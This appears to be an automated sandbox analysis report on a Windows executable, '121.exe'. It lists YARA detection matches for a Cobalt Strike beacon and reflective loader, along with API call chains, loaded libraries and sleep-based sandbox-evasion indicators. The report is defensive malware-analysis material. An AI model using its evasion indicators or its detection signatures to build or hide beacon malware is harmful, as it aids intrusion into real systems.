              Source: 0.2.121.exe.ce0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.121.exe.ce0000.2.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
              Source: 0.2.121.exe.ce0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.121.exe.ce0000.2.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
              Source: 0.2.121.exe.ce0000.2.raw.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.121.exe.ce0000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
              Source: 0.2.121.exe.a30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
              Source: 0.2.121.exe.a30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
              Source: 0.2.121.exe.a30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
              Source: 0.2.121.exe.a30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.121.exe.a30000.1.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
              Source: 0.2.121.exe.a30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.121.exe.a30000.1.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
              Source: 0.2.121.exe.a30000.1.raw.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.121.exe.a30000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 0.2.121.exe.a30000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
              Source: 0.2.121.exe.ce0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
              Source: 0.2.121.exe.ce0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
              Source: 0.2.121.exe.ce0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
              Source: 0.2.121.exe.a30000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
              Source: 0.2.121.exe.a30000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
              Source: 0.2.121.exe.a30000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
              Source: 0.2.121.exe.ce0000.2.unpack, type: UNPACKEDPEMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.121.exe.ce0000.2.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
              Source: 0.2.121.exe.a30000.1.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
              Source: 0.2.121.exe.ce0000.2.unpack, type: UNPACKEDPEMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.121.exe.a30000.1.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.121.exe.ce0000.2.unpack, type: UNPACKEDPEMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
              Source: 0.2.121.exe.ce0000.2.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.121.exe.ce0000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 0.2.121.exe.ce0000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
              Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
              Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
              Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
              Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
              Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
              Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
              Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
              Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
              Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
              Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
              Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
              Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
              Source: Process Memory Space: 121.exe PID: 5000, type: MEMORYSTRMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
              Source: Process Memory Space: 121.exe PID: 5000, type: MEMORYSTRMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
              Source: Process Memory Space: 121.exe PID: 5000, type: MEMORYSTRMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00CF0B70 LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,0_2_00CF0B70
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00CF3A64 CreateThread,GetModuleHandleA,GetProcAddress,CreateToolhelp32Snapshot,Thread32Next,Sleep,0_2_00CF3A64
              Source: 121.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\121.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: 121.exeReversingLabs: Detection: 86%
              Source: C:\Users\user\Desktop\121.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\121.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\121.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\121.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\121.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\121.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\121.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\121.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\121.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\121.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\121.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\121.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\121.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\121.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\121.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\121.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\121.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\121.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\121.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\121.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\121.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00CED83C GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00CED83C
              Source: 121.exeStatic PE information: section name: .xdata
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00A6776C push 0000006Ah; retf 0_2_00A67784
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00D1916C push 0000006Ah; retf 0_2_00D19184
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00D001A8 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00D001A8

              Malware Analysis System Evasion

              barindex
              Contains functionality to detect sleep reduction / modifications
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00CF58540_2_00CF5854
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00CEFA1C0_2_00CEFA1C
              Source: C:\Users\user\Desktop\121.exeWindow / User API: threadDelayed 2300Jump to behavior
              Source: C:\Users\user\Desktop\121.exeWindow / User API: threadDelayed 7577Jump to behavior
              Source: C:\Users\user\Desktop\121.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-37488
              Source: C:\Users\user\Desktop\121.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-37631
              Source: C:\Users\user\Desktop\121.exeAPI coverage: 6.4 %
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00CEFA1C0_2_00CEFA1C
              Source: C:\Users\user\Desktop\121.exe TID: 7080Thread sleep count: 2300 > 30Jump to behavior
              Source: C:\Users\user\Desktop\121.exe TID: 7080Thread sleep time: -23000000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\121.exe TID: 3572Thread sleep time: -60000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\121.exe TID: 7080Thread sleep count: 7577 > 30Jump to behavior
              Source: C:\Users\user\Desktop\121.exe TID: 7080Thread sleep time: -75770000s >= -30000sJump to behavior
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\121.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\121.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00CF9220 malloc,_snprintf,FindFirstFileA,free,malloc,_snprintf,free,FindNextFileA,FindClose,0_2_00CF9220
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00CF1C30 malloc,GetCurrentDirectoryA,FindFirstFileA,GetLastError,free,free,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,0_2_00CF1C30
              Source: C:\Users\user\Desktop\121.exeThread delayed: delay time: 60000Jump to behavior
              Source: 121.exe, 00000000.00000002.4495724989.000000000008C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp/
